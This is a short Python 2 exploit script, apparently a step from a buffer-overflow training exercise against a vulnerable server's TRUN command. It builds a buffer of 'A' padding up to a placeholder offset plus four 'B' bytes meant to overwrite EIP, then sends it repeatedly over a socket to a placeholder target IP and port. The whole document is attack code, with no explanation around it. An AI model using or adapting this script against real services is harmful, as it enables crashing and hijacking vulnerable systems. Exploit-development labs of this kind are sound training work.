#!/usr/bin/python
import sys, socket
from time import sleep

#B = 42424242 in EIP
shellcode = "A" * <offset_value> + "B" * 4

while True:
	try:
		s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
		s.connect((<target_ip>, <port>))
		s.send(('TRUN /.:/' + shellcode))
		s.close()
	except:
		print "Error connecting to server"
		sys.exit()
		
	
